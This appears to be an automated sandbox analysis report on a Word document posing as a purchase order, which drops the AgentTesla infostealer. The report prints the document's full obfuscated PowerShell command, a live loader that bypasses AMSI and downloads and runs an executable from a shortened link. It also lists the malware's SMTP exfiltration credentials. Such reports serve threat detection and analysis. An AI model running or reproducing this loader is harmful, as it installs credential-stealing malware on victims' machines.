Analysis
- max time kernel: 135s
- max time network: 131s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 11-03-2021 14:09
Static task: static1
Behavioral task: behavioral1
- Sample: ABSURY CHINA PO#200929H3246.doc
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: ABSURY CHINA PO#200929H3246.doc
- Resource: win10v20201028
General
- Target: ABSURY CHINA PO#200929H3246.doc
- Size: 137KB
- MD5: ac33ee5032e398b9c27377762e1f7f17
- SHA1: 56089cc1a763cf6a078babee414ff6b9ab522a8a
- SHA256: de1ec15823c3d7078339d1211ffeafd491e23c409d8d55dcc25c552beb9d3c5b
- SHA512: 4e883ecf884c46686dcd8ffa4392a1b549b0d3d4bbea9c3c07a9a421546168724da2e9b98030aed1bb99c6dee5f8cd8ae075bac4e14126bc7b7d1a61b3afde51
Malware Config
Extracted
- https://bit.ly/3cnqYgk
Extracted
- agenttesla
  Protocol: smtp
  Host: smtp.rdnsanom.xyz
  Port: 587
  Username: [email protected]
  Password: O?qr3+lOv9j_
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 200 | 648 | powershell.exe | WINWORD.EXE
- AgentTesla Payload (2 IoCs)
  Processes:
    resource | yara_rule
    behavioral2/memory/3184-25-0x0000000000400000-0x000000000043C000-memory.dmp | family_agenttesla
    behavioral2/memory/3184-26-0x000000000043746E-mapping.dmp | family_agenttesla
- Beds Protector Packer (1 IoC)
  Detects Beds Protector packer used to load .NET malware.
  Processes:
    resource | yara_rule
    behavioral2/memory/2556-22-0x0000000005830000-0x0000000005AA0000-memory.dmp | beds_protector
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow | pid | process
    14 | 200 | powershell.exe
    16 | 200 | powershell.exe
- Executes dropped EXE (2 IoCs)
  Processes:
    pid | process
    2556 | mznfchhemyw.exe
    3184 | mznfchhemyw.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    description | pid | process | target process
    PID 2556 set thread context of 3184 | 2556 | mznfchhemyw.exe | mznfchhemyw.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes:
    pid | process
    648 | WINWORD.EXE (2 entries)
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
    pid | process
    200 | powershell.exe (3 entries)
    3184 | mznfchhemyw.exe (2 entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes:
    pid | process
    648 | WINWORD.EXE
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 200 | powershell.exe
    Token: SeDebugPrivilege | 3184 | mznfchhemyw.exe
- Suspicious use of SetWindowsHookEx (17 IoCs)
  Processes:
    pid | process
    648 | WINWORD.EXE (17 entries)
- Suspicious use of WriteProcessMemory (13 IoCs)
  Processes:
    description | pid | process | target process
    PID 648 wrote to memory of 200 | 648 | WINWORD.EXE | powershell.exe (2 entries)
    PID 200 wrote to memory of 2556 | 200 | powershell.exe | mznfchhemyw.exe (3 entries)
    PID 2556 wrote to memory of 3184 | 2556 | mznfchhemyw.exe | mznfchhemyw.exe (8 entries)
Processes
-
[1] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ABSURY CHINA PO#200929H3246.doc" /o ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $sSIlTYNjhraqEeSxwG=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,84,81,78,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,49,50,52,55,48,45,51,51,57,52,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,99,72,65,82,93,40,91,66,121,116,101,93,48,120,52,49,41,43,91,99,72,97,82,93,40,91,66,89,84,69,93,48,120,54,68,41,43,91,67,72,97,114,93,40,91,98,89,84,69,93,48,120,55,51,41,43,91,67,104,65,114,93,40,91,98,121,116,69,93,48,120,54,57,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,67,72,97,82,93,40,91,98,89,116,101,93,48,120,54,49,41,43,91,67,104,97,82,93,40,91,98,89,84,101,93,48,120,54,68,41,43,91,67,104,97,82,93,40,49,52,56,45,51,51,41,43,91,99,72,65,114,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,11
6,105,111,110,46,36,40,91,99,72,65,82,93,40,91,66,121,116,101,93,48,120,52,49,41,43,91,99,72,97,82,93,40,91,66,89,84,69,93,48,120,54,68,41,43,91,67,72,97,114,93,40,91,98,89,84,69,93,48,120,55,51,41,43,91,67,104,65,114,93,40,91,98,121,116,69,93,48,120,54,57,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,67,72,97,82,93,40,91,98,89,116,101,93,48,120,54,49,41,43,91,67,104,97,82,93,40,91,98,89,84,101,93,48,120,54,68,41,43,91,67,104,97,82,93,40,49,52,56,45,51,51,41,43,91,99,72,65,114,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,84,81,78,41,59,125,101,108,115,101,32,123,125,59,36,99,108,105,101,110,116,32,61,32,110,101,119,45,111,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,59,36,97,32,61,32,39,104,116,116,112,115,58,47,47,98,105,116,46,108,121,47,51,99,110,113,89,103,107,39,46,83,112,108,105,116,40,39,44,39,41,59,36,104,117,97,115,32,61,32,36,101,110,118,58,116,101,109,112,32,43,32,39,92,109,122,110,102,99,104,104,101,109,121,119,46,101,120,101,39,59,102,111,114,101,97,99,104,40,36,98,32,105,110,32,36,97,41,123,116,114,121,123,36,99,108,105,101,110,116,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,98,46,84,111,83,116,114,105,110,103,40,41,44,32,36,104,117,97,115,41,59,73,110,118,111,107,101,45,73,116,101,109,40,36,104,117,97,115,41,59,98,114,101,97,107,59,125,99,97,116,99,104,123,119,114,105,116,101,45,104,111,115,116,32,36,95,46,69,120,99,101,112,116,105,111,110,46,77,101,115,115,97,103,101,125,125,59);[System.Text.Encoding]::ASCII.GetString($sSIlTYNjhraqEeSxwG)|&('I'+'EX');2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[3] C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
[4] C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Downloads
- C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe
  MD5: 63332ea9e6fd6bfc2275a0bc7887e406
  SHA1: 5acd50123e20554be8a9bbd16d4cc367bb7ab81b
  SHA256: c47d08441b68cd06b3d2f09c22891f4ec1b9953ec735e3fb82a6e55543bb4db2
  SHA512: 91f30a309b1cb9499263269bca87bfdf816e063dfde5ca9bb190665029add4c6eb8d1a1968a80bf5fcf118386034ad91cb0288295865bef5e15aa850c16a71a2
- memory/200-9-0x0000026CC4D90000-0x0000026CC4D92000-memory.dmp (Filesize 8KB)
- memory/200-7-0x0000000000000000-mapping.dmp
- memory/200-8-0x00007FF8454F0000-0x00007FF845EDC000-memory.dmp (Filesize 9.9MB)
- memory/200-10-0x0000026CC4D93000-0x0000026CC4D95000-memory.dmp (Filesize 8KB)
- memory/200-11-0x0000026CC6760000-0x0000026CC6761000-memory.dmp (Filesize 4KB)
- memory/200-12-0x0000026CDED70000-0x0000026CDED71000-memory.dmp (Filesize 4KB)
- memory/200-13-0x0000026CC4D96000-0x0000026CC4D98000-memory.dmp (Filesize 8KB)
- memory/648-6-0x00007FF82D760000-0x00007FF82D770000-memory.dmp (Filesize 64KB)
- memory/648-2-0x00007FF82D760000-0x00007FF82D770000-memory.dmp (Filesize 64KB)
- memory/648-3-0x00007FF82D760000-0x00007FF82D770000-memory.dmp (Filesize 64KB)
- memory/648-5-0x000002AE3ED50000-0x000002AE3F387000-memory.dmp (Filesize 6.2MB)
- memory/648-4-0x00007FF82D760000-0x00007FF82D770000-memory.dmp (Filesize 64KB)
- memory/2556-18-0x0000000000C20000-0x0000000000C21000-memory.dmp (Filesize 4KB)
- memory/2556-14-0x0000000000000000-mapping.dmp
- memory/2556-20-0x0000000005D30000-0x0000000005D31000-memory.dmp (Filesize 4KB)
- memory/2556-21-0x0000000005700000-0x0000000005701000-memory.dmp (Filesize 4KB)
- memory/2556-22-0x0000000005830000-0x0000000005AA0000-memory.dmp (Filesize 2.4MB)
- memory/2556-23-0x0000000005B40000-0x0000000005B41000-memory.dmp (Filesize 4KB)
- memory/2556-24-0x00000000057E0000-0x00000000057EF000-memory.dmp (Filesize 60KB)
- memory/2556-17-0x0000000073FF0000-0x00000000746DE000-memory.dmp (Filesize 6.9MB)
- memory/2556-27-0x00000000057F0000-0x00000000057F1000-memory.dmp (Filesize 4KB)
- memory/3184-26-0x000000000043746E-mapping.dmp
- memory/3184-25-0x0000000000400000-0x000000000043C000-memory.dmp (Filesize 240KB)
- memory/3184-29-0x0000000073FF0000-0x00000000746DE000-memory.dmp (Filesize 6.9MB)
- memory/3184-34-0x0000000005200000-0x0000000005201000-memory.dmp (Filesize 4KB)
- memory/3184-35-0x0000000005520000-0x0000000005521000-memory.dmp (Filesize 4KB)
- memory/3184-36-0x0000000005BB0000-0x0000000005BB1000-memory.dmp (Filesize 4KB)
- memory/3184-38-0x00000000007B0000-0x00000000007B1000-memory.dmp (Filesize 4KB)